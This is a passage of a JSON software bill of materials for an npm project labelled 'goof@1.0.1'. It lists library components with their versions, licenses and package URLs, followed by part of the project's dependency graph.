f":"589-string-width@2.1.1","type":"library","name":"string-width","version":"2.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/string-width@2.1.1"},{"bom-ref":"590-is-fullwidth-code-point@2.0.0","type":"library","name":"is-fullwidth-code-point","version":"2.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-fullwidth-code-point@2.0.0"},{"bom-ref":"591-strip-ansi@4.0.0","type":"library","name":"strip-ansi","version":"4.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/strip-ansi@4.0.0"},{"bom-ref":"592-ansi-regex@3.0.0","type":"library","name":"ansi-regex","version":"3.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ansi-regex@3.0.0"},{"bom-ref":"593-wrap-ansi@2.1.0","type":"library","name":"wrap-ansi","version":"2.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/wrap-ansi@2.1.0"},{"bom-ref":"594-string-width@1.0.2","type":"library","name":"string-width","version":"1.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/string-width@1.0.2"},{"bom-ref":"595-code-point-at@1.1.0","type":"library","name":"code-point-at","version":"1.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/code-point-at@1.1.0"},{"bom-ref":"596-is-fullwidth-code-point@1.0.0","type":"library","name":"is-fullwidth-code-point","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-fullwidth-code-point@1.0.0"},{"bom-ref":"597-get-caller-file@1.0.2","type":"library","name":"get-caller-file","version":"1.0.2","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/get-caller-file@1.0.2"},{"bom-ref":"598-os-locale@2.1.0","type":"library","name":"os-locale","version":"2.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/os-locale@2.1.0"},{"bom-ref":"599-execa@0.7.0","type":"library","name":"execa","version":"0.7.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/execa@0.7.0"},{"bom-ref":"600-cross-spawn@5.1.0","type":"library","name":"cross-spawn","version":"5.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/cross-spawn@5.1.0"},{"bom-ref":"601-lru-cache@4.1.3","type":"library","name":"lru-cache","version":"4.1.3","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/lru-cache@4.1.3"},{"bom-ref":"602-shebang-command@1.2.0","type":"library","name":"shebang-command","version":"1.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/shebang-command@1.2.0"},{"bom-ref":"603-shebang-regex@1.0.0","type":"library","name":"shebang-regex","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/shebang-regex@1.0.0"},{"bom-ref":"604-get-stream@3.0.0","type":"library","name":"get-stream","version":"3.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/get-stream@3.0.0"},{"bom-ref":"605-is-stream@1.1.0","type":"library","name":"is-stream","version":"1.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-stream@1.1.0"},{"bom-ref":"606-npm-run-path@2.0.2","type":"library","name":"npm-run-path","version":"2.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/npm-run-path@2.0.2"},{"bom-ref":"607-path-key@2.0.1","type":"library","name":"path-key","version":"2.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/path-key@2.0.1"},{"bom-ref":"608-p-finally@1.0.0","type":"library","name":"p-finally","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/p-finally@1.0.0"},{"bom-ref":"609-strip-eof@1.0.0","type":"library","name":"strip-eof","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/strip-eof@1.0.0"},{"bom-ref":"610-lcid@1.0.0","type":"library","name":"lcid","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/lcid@1.0.0"},{"bom-ref":"611-invert-kv@1.0.0","type":"library","name":"invert-kv","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/invert-kv@1.0.0"},{"bom-ref":"612-mem@1.1.0","type":"library","name":"mem","version":"1.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mem@1.1.0"},{"bom-ref":"613-mimic-fn@1.2.0","type":"library","name":"mimic-fn","version":"1.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mimic-fn@1.2.0"},{"bom-ref":"614-require-directory@2.1.1","type":"library","name":"require-directory","version":"2.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/require-directory@2.1.1"},{"bom-ref":"615-set-blocking@2.0.0","type":"library","name":"set-blocking","version":"2.0.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/set-blocking@2.0.0"},{"bom-ref":"616-which-module@2.0.0","type":"library","name":"which-module","version":"2.0.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/which-module@2.0.0"},{"bom-ref":"617-y18n@3.2.1","type":"library","name":"y18n","version":"3.2.1","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/y18n@3.2.1"},{"bom-ref":"618-yargs-parser@9.0.2","type":"library","name":"yargs-parser","version":"9.0.2","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/yargs-parser@9.0.2"},{"bom-ref":"619-camelcase@4.1.0","type":"library","name":"camelcase","version":"4.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/camelcase@4.1.0"},{"bom-ref":"620-yargs-parser@8.1.0","type":"library","name":"yargs-parser","version":"8.1.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/yargs-parser@8.1.0"},{"bom-ref":"621-opener@1.5.1","type":"library","name":"opener","version":"1.5.1","licenses":[{"expression":"(WTFPL OR MIT)"}],"purl":"pkg:npm/opener@1.5.1"},{"bom-ref":"622-own-or@1.0.0","type":"library","name":"own-or","version":"1.0.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/own-or@1.0.0"},{"bom-ref":"623-own-or-env@1.0.1","type":"library","name":"own-or-env","version":"1.0.1","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/own-or-env@1.0.1"},{"bom-ref":"624-source-map-support@0.5.16","type":"library","name":"source-map-support","version":"0.5.16","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/source-map-support@0.5.16"},{"bom-ref":"625-stack-utils@1.0.2","type":"library","name":"stack-utils","version":"1.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/stack-utils@1.0.2"},{"bom-ref":"626-tap-mocha-reporter@3.0.9","type":"library","name":"tap-mocha-reporter","version":"3.0.9","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/tap-mocha-reporter@3.0.9"},{"bom-ref":"627-diff@1.4.0","type":"library","name":"diff","version":"1.4.0","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/diff@1.4.0"},{"bom-ref":"628-tap-parser@5.4.0","type":"library","name":"tap-parser","version":"5.4.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/tap-parser@5.4.0"},{"bom-ref":"629-events-to-array@1.1.2","type":"library","name":"events-to-array","version":"1.1.2","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/events-to-array@1.1.2"},{"bom-ref":"630-unicode-length@1.0.3","type":"library","name":"unicode-length","version":"1.0.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/unicode-length@1.0.3"},{"bom-ref":"631-tap-parser@7.0.0","type":"library","name":"tap-parser","version":"7.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/tap-parser@7.0.0"},{"bom-ref":"632-tmatch@3.1.0","type":"library","name":"tmatch","version":"3.1.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/tmatch@3.1.0"},{"bom-ref":"633-trivial-deferred@1.0.1","type":"library","name":"trivial-deferred","version":"1.0.1","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/trivial-deferred@1.0.1"},{"bom-ref":"634-tsame@1.1.2","type":"library","name":"tsame","version":"1.1.2","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/tsame@1.1.2"},{"bom-ref":"635-write-file-atomic@2.4.3","type":"library","name":"write-file-atomic","version":"2.4.3","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/write-file-atomic@2.4.3"},{"bom-ref":"636-yapool@1.0.0","type":"library","name":"yapool","version":"1.0.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/yapool@1.0.0"},{"bom-ref":"637-typeorm@0.2.24","type":"library","name":"typeorm","version":"0.2.24","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/typeorm@0.2.24"},{"bom-ref":"638-app-root-path@3.0.0","type":"library","name":"app-root-path","version":"3.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/app-root-path@3.0.0"},{"bom-ref":"639-buffer@5.6.0","type":"library","name":"buffer","version":"5.6.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/buffer@5.6.0"},{"bom-ref":"640-chalk@2.4.2","type":"library","name":"chalk","version":"2.4.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/chalk@2.4.2"},{"bom-ref":"641-ansi-styles@3.2.1","type":"library","name":"ansi-styles","version":"3.2.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ansi-styles@3.2.1"},{"bom-ref":"642-color-convert@1.9.3","type":"library","name":"color-convert","version":"1.9.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/color-convert@1.9.3"},{"bom-ref":"643-color-name@1.1.3","type":"library","name":"color-name","version":"1.1.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/color-name@1.1.3"},{"bom-ref":"644-supports-color@5.5.0","type":"library","name":"supports-color","version":"5.5.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/supports-color@5.5.0"},{"bom-ref":"645-has-flag@3.0.0","type":"library","name":"has-flag","version":"3.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/has-flag@3.0.0"},{"bom-ref":"646-cli-highlight@2.1.4","type":"library","name":"cli-highlight","version":"2.1.4","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/cli-highlight@2.1.4"},{"bom-ref":"647-chalk@3.0.0","type":"library","name":"chalk","version":"3.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/chalk@3.0.0"},{"bom-ref":"648-ansi-styles@4.2.1","type":"library","name":"ansi-styles","version":"4.2.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ansi-styles@4.2.1"},{"bom-ref":"649-@types/color-name@1.1.1","type":"library","group":"@types","name":"@types/color-name","version":"1.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/%40types/color-name@1.1.1"},{"bom-ref":"650-color-convert@2.0.1","type":"library","name":"color-convert","version":"2.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/color-convert@2.0.1"},{"bom-ref":"651-color-name@1.1.4","type":"library","name":"color-name","version":"1.1.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/color-name@1.1.4"},{"bom-ref":"652-supports-color@7.1.0","type":"library","name":"supports-color","version":"7.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/supports-color@7.1.0"},{"bom-ref":"653-has-flag@4.0.0","type":"library","name":"has-flag","version":"4.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/has-flag@4.0.0"},{"bom-ref":"654-highlight.js@9.18.1","type":"library","name":"highlight.js","version":"9.18.1","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/highlight.js@9.18.1"},{"bom-ref":"655-mz@2.7.0","type":"library","name":"mz","version":"2.7.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mz@2.7.0"},{"bom-ref":"656-any-promise@1.3.0","type":"library","name":"any-promise","version":"1.3.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/any-promise@1.3.0"},{"bom-ref":"657-thenify-all@1.6.0","type":"library","name":"thenify-all","version":"1.6.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/thenify-all@1.6.0"},{"bom-ref":"658-thenify@3.3.1","type":"library","name":"thenify","version":"3.3.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/thenify@3.3.1"},{"bom-ref":"659-parse5@5.1.1","type":"library","name":"parse5","version":"5.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/parse5@5.1.1"},{"bom-ref":"660-parse5-htmlparser2-tree-adapter@5.1.1","type":"library","name":"parse5-htmlparser2-tree-adapter","version":"5.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/parse5-htmlparser2-tree-adapter@5.1.1"},{"bom-ref":"661-yargs@15.4.1","type":"library","name":"yargs","version":"15.4.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/yargs@15.4.1"},{"bom-ref":"662-cliui@6.0.0","type":"library","name":"cliui","version":"6.0.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/cliui@6.0.0"},{"bom-ref":"663-string-width@4.2.0","type":"library","name":"string-width","version":"4.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/string-width@4.2.0"},{"bom-ref":"664-emoji-regex@8.0.0","type":"library","name":"emoji-regex","version":"8.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/emoji-regex@8.0.0"},{"bom-ref":"665-is-fullwidth-code-point@3.0.0","type":"library","name":"is-fullwidth-code-point","version":"3.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-fullwidth-code-point@3.0.0"},{"bom-ref":"666-strip-ansi@6.0.0","type":"library","name":"strip-ansi","version":"6.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/strip-ansi@6.0.0"},{"bom-ref":"667-ansi-regex@5.0.0","type":"library","name":"ansi-regex","version":"5.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ansi-regex@5.0.0"},{"bom-ref":"668-wrap-ansi@6.2.0","type":"library","name":"wrap-ansi","version":"6.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/wrap-ansi@6.2.0"},{"bom-ref":"669-find-up@4.1.0","type":"library","name":"find-up","version":"4.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/find-up@4.1.0"},{"bom-ref":"670-locate-path@5.0.0","type":"library","name":"locate-path","version":"5.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/locate-path@5.0.0"},{"bom-ref":"671-p-locate@4.1.0","type":"library","name":"p-locate","version":"4.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/p-locate@4.1.0"},{"bom-ref":"672-p-limit@2.3.0","type":"library","name":"p-limit","version":"2.3.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/p-limit@2.3.0"},{"bom-ref":"673-p-try@2.2.0","type":"library","name":"p-try","version":"2.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/p-try@2.2.0"},{"bom-ref":"674-path-exists@4.0.0","type":"library","name":"path-exists","version":"4.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/path-exists@4.0.0"},{"bom-ref":"675-get-caller-file@2.0.5","type":"library","name":"get-caller-file","version":"2.0.5","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/get-caller-file@2.0.5"},{"bom-ref":"676-require-main-filename@2.0.0","type":"library","name":"require-main-filename","version":"2.0.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/require-main-filename@2.0.0"},{"bom-ref":"677-y18n@4.0.0","type":"library","name":"y18n","version":"4.0.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/y18n@4.0.0"},{"bom-ref":"678-yargs-parser@18.1.3","type":"library","name":"yargs-parser","version":"18.1.3","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/yargs-parser@18.1.3"},{"bom-ref":"679-camelcase@5.3.1","type":"library","name":"camelcase","version":"5.3.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/camelcase@5.3.1"},{"bom-ref":"680-dotenv@6.2.0","type":"library","name":"dotenv","version":"6.2.0","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/dotenv@6.2.0"},{"bom-ref":"681-mkdirp@0.5.5","type":"library","name":"mkdirp","version":"0.5.5","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mkdirp@0.5.5"},{"bom-ref":"682-reflect-metadata@0.1.13","type":"library","name":"reflect-metadata","version":"0.1.13","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/reflect-metadata@0.1.13"},{"bom-ref":"683-sha.js@2.4.11","type":"library","name":"sha.js","version":"2.4.11","licenses":[{"expression":"(MIT AND BSD-3-Clause)"}],"purl":"pkg:npm/sha.js@2.4.11"},{"bom-ref":"684-tslib@1.10.0","type":"library","name":"tslib","version":"1.10.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/tslib@1.10.0"},{"bom-ref":"685-xml2js@0.4.23","type":"library","name":"xml2js","version":"0.4.23","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/xml2js@0.4.23"},{"bom-ref":"686-sax@1.2.4","type":"library","name":"sax","version":"1.2.4","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/sax@1.2.4"},{"bom-ref":"687-xmlbuilder@11.0.1","type":"library","name":"xmlbuilder","version":"11.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/xmlbuilder@11.0.1"},{"bom-ref":"688-yargonaut@1.1.4","type":"library","name":"yargonaut","version":"1.1.4","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/yargonaut@1.1.4"},{"bom-ref":"689-figlet@1.5.0","type":"library","name":"figlet","version":"1.5.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/figlet@1.5.0"},{"bom-ref":"690-parent-require@1.0.0","type":"library","name":"parent-require","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/parent-require@1.0.0"},{"bom-ref":"691-yargs@13.3.2","type":"library","name":"yargs","version":"13.3.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/yargs@13.3.2"},{"bom-ref":"692-cliui@5.0.0","type":"library","name":"cliui","version":"5.0.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/cliui@5.0.0"},{"bom-ref":"693-string-width@3.1.0","type":"library","name":"string-width","version":"3.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/string-width@3.1.0"},{"bom-ref":"694-emoji-regex@7.0.3","type":"library","name":"emoji-regex","version":"7.0.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/emoji-regex@7.0.3"},{"bom-ref":"695-strip-ansi@5.2.0","type":"library","name":"strip-ansi","version":"5.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/strip-ansi@5.2.0"},{"bom-ref":"696-ansi-regex@4.1.0","type":"library","name":"ansi-regex","version":"4.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ansi-regex@4.1.0"},{"bom-ref":"697-wrap-ansi@5.1.0","type":"library","name":"wrap-ansi","version":"5.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/wrap-ansi@5.1.0"},{"bom-ref":"698-find-up@3.0.0","type":"library","name":"find-up","version":"3.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/find-up@3.0.0"},{"bom-ref":"699-locate-path@3.0.0","type":"library","name":"locate-path","version":"3.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/locate-path@3.0.0"},{"bom-ref":"700-p-locate@3.0.0","type":"library","name":"p-locate","version":"3.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/p-locate@3.0.0"},{"bom-ref":"701-yargs-parser@13.1.2","type":"library","name":"yargs-parser","version":"13.1.2","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/yargs-parser@13.1.2"}],"dependencies":[{"ref":"1-goof@1.0.1","dependsOn":["2-adm-zip@0.4.7","3-body-parser@1.9.0","15-cfenv@1.2.2","22-consolidate@0.14.5","24-csv-parse@6.1.0","25-dompurify@3.3.0","27-dustjs-helpers@1.5.0","28-dustjs-linkedin@2.5.0","29-ejs@1.0.0","30-ejs-locals@1.0.2","32-errorhandler@1.2.0","36-express@4.12.4","69-express-fileupload@0.0.5","89-express-session@1.17.2","98-express-validator@7.3.1","101-file-type@8.1.0","102-hbs@4.0.4","112-html-escaper@3.0.3","113-humanize-ms@1.0.1","115-jquery@2.2.4","116-jsdom@27.2.0","162-lodash@4.17.4","163-marked@0.3.5","164-method-override@3.0.0","167-moment@2.15.1","168-mongodb@3.5.9","186-mongoose@6.13.6","285-morgan@1.10.0","289-ms@0.7.3","290-multer@2.0.2","303-mysql@2.18.1","306-node-cron@3.0.3","308-npmconf@0.0.24","320-optional@0.1.4","321-st@0.2.4","328-stream-buffers@3.0.2","329-tap@11.1.5","637-typeorm@0.2.24","100-validator@13.15.23"]},{"ref":"2-adm-zip@0.4.7"},{"ref":"3-body-parser@1.9.0","dependsOn":["4-bytes@1.0.0","5-depd@1.0.1","6-iconv-lite@0.4.4","7-media-typer@0.3.0","8-on-finished@2.1.0","10-qs@2.2.4","11-raw-body@1.3.0","12-type-is@1.5.7"]},{"ref":"4-bytes@1.0.0"},{"ref":"5-depd@1.0.1"},{"ref":"6-iconv-lite@0.4.4"},{"ref":"7-media-typer@0.3.0"},{"ref":"8-on-finished@2.1.0","dependsOn":["9-ee-first@1.0.5"]},{"ref":"9-ee-first@1.0.5"},{"ref":"10-qs@2.2.4"},{"ref":"11-raw-body@1.3.0","dependsOn":["4-bytes@1.0.0","6-iconv-lite@0.4.4"]},{"ref":"12-type-is@1.5.7","dependsOn":["7-media-typer@0.3.0","13-mime-types@2.0.14"]},{"ref":"13-mime-types@2.0.14","dependsOn":["14-mime-db@1.12.0"]},{"ref":"14-mime-db@1.12.0"},{"ref":"15-cfenv@1.2.2","dependsOn":["16-js-yaml@3.13.1","20-ports@1.1.0","21-underscore@1.9.1"]},{"ref":"16-js-yaml@3.13.1","dependsOn":["17-argparse@1.0.10","19-esprima@4.0.1"]},{"ref":"17-argparse@1.0.10","dependsOn":["18-sprintf-js@1.0.3"]},{"ref":"18-sprintf-js@1.0.3"},{"ref":"19-esprima@4.0.1"},{"ref":"20-ports@1.1.0"},{"ref":"21-underscore@1.9.1"},{"ref":"22-consolidate@0.14.5","dependsOn":["23-bluebird@3.5.4"]},{"ref":"23-bluebird@3.5.4"},{"ref":"24-csv-parse@6.1.0"},{"ref":"25-dompurify@3.3.0","dependsOn":["26-@types/trusted-types@2.0.7"]},{"ref":"26-@types/trusted-types@2.0.7"},{"ref":"27-dustjs-helpers@1.5.0"},{"ref":"28-dustjs-linkedin@2.5.0"},{"ref":"29-ejs@1.0.0"},{"ref":"30-ejs-locals@1.0.2","dependsOn":["31-ejs@0.8.8"]},{"ref":"31-ejs@0.8.8"},{"ref":"32-errorhandler@1.2.0","dependsOn":["33-accepts@1.1.4","35-escape-html@1.0.1"]},{"ref":"33-accepts@1.1.4","dependsOn":["13-mime-types@2.0.14","34-negotiator@0.4.9"]},{"ref":"34-negotiator@0.4.9"},{"ref":"35-escape-html@1.0.1"},{"ref":"36-express@4.12.4","dependsOn":["37-accepts@1.2.13","41-content-disposition@0.5.0","42-content-type@1.0.4","43-cookie@0.1.2","44-cookie-signature@1.0.6","45-debug@2.2.0","5-depd@1.0.1","35-escape-html@1.0.1","47-etag@1.6.0","49-finalhandler@0.3.6","52-fresh@0.2.4","53-merge-descriptors@1.0.0","54-methods@1.1.2","50-on-finished@2.2.1","55-parseurl@1.3.3","56-path-to-regexp@0.1.3","57-proxy-addr@1.0.10","60-qs@2.4.2","61-range-parser@1.0.3","62-send@0.12.3","65-serve-static@1.9.3","67-type-is@1.6.16","66-utils-merge@1.0.0","68-vary@1.0.1"]},{"ref":"37-accepts@1.2.13","dependsOn":["38-mime-types@2.1.23","40-negotiator@0.5.3"]},{"ref":"38-mime-types@2.1.23","dependsOn":["39-mime-db@1.39.0"]},{"ref":"39-mime-db@1.39.0"},{"ref":"40-negotiator@0.5.3"},{"ref":"41-content-disposition@0.5.0"},{"ref":"42-content-type@1.0.4"},{"ref":"43-cookie@0.1.2"},{"ref":"44-cookie-signature@1.0.6"},{"ref":"45-debug@2.2.0","dependsOn":["46-ms@0.7.1"]},{"ref":"46-ms@0.7.1"},{"ref":"47-etag@1.6.0","dependsOn":["48-crc@3.2.1"]},{"ref":"48-crc@3.2.1"},{"ref":"49-finalhandler@0.3.6","dependsOn":["45-debug@2.2.0","35-escape-html@1.0.1","50-on-finished@2.2.1"]},{"ref":"50-on-finished@2.2.1","dependsOn":["51-ee-first@1.1.0"]},{"ref":"51-ee-first@1.1.0"},{"ref":"52-fresh@0.2.4"},{"ref":"53-merge-descriptors@1.0.0"},{"ref":"54-methods@1.1.2"},{"ref":"55-parseurl@1.3.3"},{"ref":"56-path-to-regexp@0.1.3"},{"ref":"57-proxy-addr@1.0.10","dependsOn":["58-forwarded@0.1.2","59-ipaddr.js@1.0.5"]},{"ref":"58-forwarded@0.1.2"},{"ref":"59-ipaddr.js@1.0.5"},{"ref":"60-qs@2.4.2"},{"ref":"61-range-parser@1.0.3"},{"ref":"62-send@0.12.3","dependsOn":["45-debug@2.2.0","5-depd@1.0.1","63-destroy@1.0.3","35-escape-html@1.0.1","47-etag@1.6.0","52-fresh@0.2.4","64-mime@1.3.4","46-ms@0.7.1","50-on-finished@2.2.1","61-range-parser@1.0.3"]},{"ref":"63-destroy@1.0.3"},{"ref":"64-mime@1.3.4"},{"ref":"65-serve-static@1.9.3","dependsOn":["35-escape-html@1.0.1","55-parseurl@1.3.3","62-send@0.12.3","66-utils-merge@1.0.0"]},{"ref":"66-utils-merge@1.0.0"},{"ref":"67-type-is@1.6.16","dependsOn":["7-media-typer@0.3.0","38-mime-types@2.1.23"]},{"ref":"68-vary@1.0.1"},{"ref":"69-express-fileupload@0.0.5","dependsOn":["70-connect-busboy@0.0.2","73-fs-extra@0.22.1","88-streamifier@0.1.1"]},{"ref":"70-connect-busboy@0.0.2","dependsOn":["71-busboy@1.6.0"]},{"ref":"71-busboy@1.6.0","dependsOn":["72-streamsearch@1.1.0"]},{"ref":"72-streamsearch@1.1.0"},{"ref":"73-fs-extra@0.22.1","dependsOn":["74-graceful-fs@4.1.15","75-jsonfile@2.4.0","76-rimraf@2.6.3"]},{"ref":"74-graceful-fs@4.1.15"},{"ref":"75-jsonfile@2.4.0","dependsOn":["74-graceful-fs@4.1.15"]},{"ref":"76-rimraf@2.6.3","dependsOn":["77-glob@7.1.3"]},{"ref":"77-glob@7.1.3","dependsOn":["78-fs.realpath@1.0.0","79-inflight@1.0.6","82-inherits@2.0.3","83-minimatch@3.0.4","80-once@1.4.0","87-path-is-absolute@1.0.1"]},{"ref":"78-fs.realpath@1.0.0"},{"ref":"79-inflight@1.0.6","dependsOn":["80-once@1.4.0","81-wrappy@1.0.2"]},{"ref":"80-once@1.4.0","dependsOn":["81-wrappy@1.0.2"]},{"ref":"81-wrappy@1.0.2"},{"ref":"82-inherits@2.0.3"},{"ref":"83-minimatch@3.0.4","dependsOn":["84-brace-expansion@1.1.11"]},{"ref":"84-brace-expansion@1.1.11","dependsOn":["85-balanced-match@1.0.0","86-concat-map@0.0.1"]},{"ref":"85-balanced-match@1.0.0"},{"ref":"86-concat-map@0.0.1"},{"ref":"87-path-is-absolute@1.0.1"},{"ref":"88-streamifier@0.1.1"},{"ref":"89-express-session@1.17.2","dependsOn":["90-cookie@0.4.1","44-cookie-signature@1.0.6","91-debug@2.6.9","93-depd@2.0.0","94-on-headers@1.0.2","55-parseurl@1.3.3","95-safe-buffer@5.2.1","96-uid-safe@2.1.5"]},{"ref":"90-cookie@0.4.1"},{"ref":"91-debug@2.6.9","dependsOn":["92-ms@2.0.0"]},{"ref":"92-ms@2.0.0"},{"ref":"93-depd@2.0.0"},{"ref":"94-on-headers@1.0.2"},{"ref":"95-safe-buffer@5.2.1"},{"ref":"96-uid-safe@2.1.5","dependsOn":["97-random-bytes@1.0.0"]},{"ref":"97-random-bytes@1.0.0"},{"ref":"98-express-validator@7.3.1","dependsOn":["99-lodash@4.17.21","100-validator@13.15.23"]},{"ref":"99-lodash@4.17.21"},{"ref":"100-validator@13.15.23"},{"ref":"101-file-type@8.1.0"},{"ref":"102-hbs@4.0.4","dependsOn":["103-handlebars@4.0.14","110-walk@2.3.9"]},{"ref":"103-handlebars@4.0.14","dependsOn":["104-async@2.6.3","105-optimist@0.6.1","108-source-map@0.6.1","109-uglify-js@3.13.9"]},{"ref":"104-async@2.6.3","dependsOn":["99-lodash@4.17.21"]},{"ref":"105-optimist@0.6.1","dependsOn":["106-minimist@0.0.10","107-wordwrap@0.0.3"]},{"ref":"106-minimist@0.0.10"},{"ref":"107-wordwrap@0.0.3"},{"ref":"108-source-map@0.6.1"},{"ref":"109-uglify-js@3.13.9"},{"ref":"110-walk@2.3.9","dependsOn":["111-foreachasync@3.0.0"]},{"ref":"111-foreachasync@3.0.0"},{"ref":"112-html-escaper@3.0.3"},{"ref":"113-humanize-ms@1.0.1","dependsOn":["114-ms@0.6.2"]},{"ref":"114-ms@0.6.2"},{"ref":"115-jquery@2.2.4"},{"ref":"116-jsdom@27.2.0","dependsOn":["117-@acemir/cssom@0.9.23","118-@asamuzakjp/dom-selector@6.7.4","127-cssstyle@5.3.3","135-data-urls@6.0.0","141-decimal.js@10.6.0","142-html-encoding-sniffer@4.0.0","146-http-proxy-agent@7.0.2","150-https-proxy-agent@7.0.6","125-is-potential-custom-element-name@1.0.1","151-parse5@8.0.0","153-saxes@6.0.0","155-symbol-tree@3.2.4","156-tough-cookie@6.0.0","159-w3c-xmlserializer@5.0.0","140-webidl-conversions@8.0.0","143-whatwg-encoding@3.1.1","136-whatwg-mimetype@4.0.0","137-whatwg-url@15.1.0","161-ws@8.18.3","160-xml-name-validator@5.0.0"]},{"ref":"117-